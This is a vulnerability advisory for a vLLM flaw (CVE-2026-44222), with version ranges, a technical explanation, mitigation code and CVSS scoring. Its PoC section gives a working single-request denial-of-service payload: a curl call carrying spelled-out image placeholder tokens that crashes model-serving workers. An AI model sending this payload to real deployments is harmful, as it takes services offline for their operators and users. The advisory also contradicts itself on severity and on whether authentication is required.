## Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| vllm | pip | >= 0.6.1, < 0.20.0 | 0.20.0 |
## Recommended Action

A patch is available: update vllm to version 0.20.0 or later.
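To check whether a deployment falls inside the advisory's vulnerable range (`>= 0.6.1, < 0.20.0`), a minimal sketch is shown below. The helper names are illustrative, and the version parsing is a simplified dotted-integer comparison rather than full PEP 440 handling (pre-release and post-release suffixes are not handled):

```python
# Hypothetical helper: test a vllm version string against the advisory's
# vulnerable range (>= 0.6.1, < 0.20.0). Simplified parsing, not PEP 440.
def parse(version: str) -> tuple:
    return tuple(int(part) for part in version.split("."))

def is_vulnerable(version: str) -> bool:
    return parse("0.6.1") <= parse(version) < parse("0.20.0")

print(is_vulnerable("0.10.0"))  # version the PoC was reproduced on -> True
print(is_vulnerable("0.20.0"))  # patched release -> False
```

In production, the same check is more robustly done with `packaging.version.Version`, which handles non-numeric version components.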
## Frequently Asked Questions

### What is CVE-2026-44222?

CVE-2026-44222 is a vulnerability in vLLM that makes deployments serving vision-language models vulnerable to remote denial of service via special-token placeholders in text-only prompts.

### Is CVE-2026-44222 actively exploited?

No confirmed active exploitation of CVE-2026-44222 has been reported, but organizations should still patch proactively.

### How to fix CVE-2026-44222?

Update to the patched version: vllm 0.20.0.

### What is the CVSS score for CVE-2026-44222?

CVE-2026-44222 has a CVSS v3.1 base score of 6.5 (Medium).
## Technical Details

### NVD Description
## Summary

This report explains a token-injection vulnerability in vLLM's multimodal processing. Unauthenticated, text-only prompts that spell out special tokens are interpreted as control tokens. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled `IndexError` and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

## Details

- Affected component: multimodal input-position computation.
- File/functions (paths are indicative):
  - `vllm/model_executor/layers/rotary_embedding.py`
    - `get_input_positions_tensor(...)`
    - `_vl_get_input_positions_tensor(...)`
- Failure mechanism:
  - The code counts detected vision tokens and then indexes `video_grid_thw`/`image_grid_thw` accordingly.
  - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
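The failure mechanism reduces to a few lines of plain Python: the position code counts placeholder tokens found in the prompt, then indexes a grid list that is empty because no payload accompanied the request. The names and token id below are illustrative, not the actual vLLM source:

```python
# Illustrative reduction of the bug pattern (not the actual vLLM code).
IMAGE_TOKEN_ID = 151655          # hypothetical placeholder token id
input_tokens = [1, 2, IMAGE_TOKEN_ID, 3]   # prompt spells out the placeholder
image_grid_thw = []              # empty: no image payload accompanied the prompt

# The position code counts placeholders...
image_nums = sum(tok == IMAGE_TOKEN_ID for tok in input_tokens)

# ...then indexes the grid once per placeholder, with no bounds check.
try:
    for image_index in range(image_nums):
        t, h, w = image_grid_thw[image_index]   # fails on the first iteration
except IndexError as exc:
    error = f"IndexError: {exc}"
    print(error)  # IndexError: list index out of range
```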
Representative snippet (context):

```python
# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )
```

Abbreviated call path:

```
OpenAI API request
  → vllm.v1.engine.core: step/execute_model
  → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
  → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
  → _vl_get_input_positions_tensor
  → IndexError: list index out of range
```

## PoC

### Environment

- vLLM: 0.10.0
- Model: Qwen/Qwen2.5-VL-3B-Instruct
- Launch server:

```bash
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000
```

### Request (text-only, no image/video data)

```bash
cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        {
          "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>"
        }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json
```

### Observed result

- HTTP 500; logs show `IndexError: list index out of range` from `_vl_get_input_positions_tensor(...)`.
- In some deployments, the worker exits and capacity remains reduced until manual restart.

## Impact

- Type: token injection leading to remote denial of service (unauthenticated). A single request can trigger the fault.
- Scope: any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
- Effect: request → unhandled exception in position computation → worker termination / service unavailability.
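One mitigation direction, sketched below, is to validate that the number of detected placeholder tokens matches the number of supplied payload grids before indexing, and raise a catchable error that the API layer can map to an HTTP 400 instead of letting an `IndexError` escape. This is a hypothetical guard for illustration, not the upstream patch; the function name and signature are assumptions:

```python
def check_placeholder_payloads(num_placeholders: int, grid_thw: list) -> None:
    """Hypothetical pre-check before input-position computation.

    Rejects prompts that spell out more multimodal placeholders than
    there are payload grids, so the request fails cleanly instead of
    crashing the worker with an IndexError.
    """
    if num_placeholders > len(grid_thw):
        raise ValueError(
            f"prompt contains {num_placeholders} multimodal placeholder(s) "
            f"but only {len(grid_thw)} payload grid(s) were supplied"
        )

# A text-only prompt spelling one <|image_pad|> token, with no image data:
try:
    check_placeholder_payloads(num_placeholders=1, grid_thw=[])
except ValueError as exc:
    print(f"rejected: {exc}")
```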
## Fixes

- Changes associated with https://github.com/vllm-project/vllm/issues/32656

## Credits

- Pengyu Ding (Infra Security, Ant Group)
- Ziteng Xu (Infra Security, Ant Group)
## CVSS Vector

`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H`
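The 6.5 base score can be reproduced from this vector with the CVSS v3.1 base-score formula. The sketch below hard-codes only the metric weights this vector uses (scope unchanged) and uses a simplified version of the spec's Roundup function:

```python
import math

# CVSS v3.1 metric weights for CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.
AV, AC, PR, UI = 0.85, 0.77, 0.62, 0.85   # Network / Low / Low (S:U) / None
C, I, A = 0.0, 0.0, 0.56                  # None / None / High

iss = 1 - (1 - C) * (1 - I) * (1 - A)     # Impact Sub-Score
impact = 6.42 * iss                       # scope unchanged
exploitability = 8.22 * AV * AC * PR * UI

def roundup(x: float) -> float:
    # Simplified CVSS v3.1 Roundup: smallest one-decimal value >= x.
    return math.ceil(x * 10) / 10

base_score = roundup(min(impact + exploitability, 10))
print(base_score)  # 6.5
```

The all-availability impact (`C:N/I:N/A:H`) is what caps this remote, low-privilege DoS at 6.5 rather than a higher score.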
## Related Vulnerabilities

Other vulnerabilities in the same package (vllm):

- CVE-2024-9053 (9.8): vllm RCE via unsafe pickle deserialization in RPC server
- CVE-2026-25960 (9.8): vllm SSRF allows internal network access
- CVE-2025-47277 (9.8): vLLM RCE via exposed TCPStore in distributed inference
- CVE-2024-11041 (9.8): vllm RCE via unsafe pickle deserialization in MessageQueue
- CVE-2025-32444 (9.8): vLLM RCE via pickle deserialization on ZeroMQ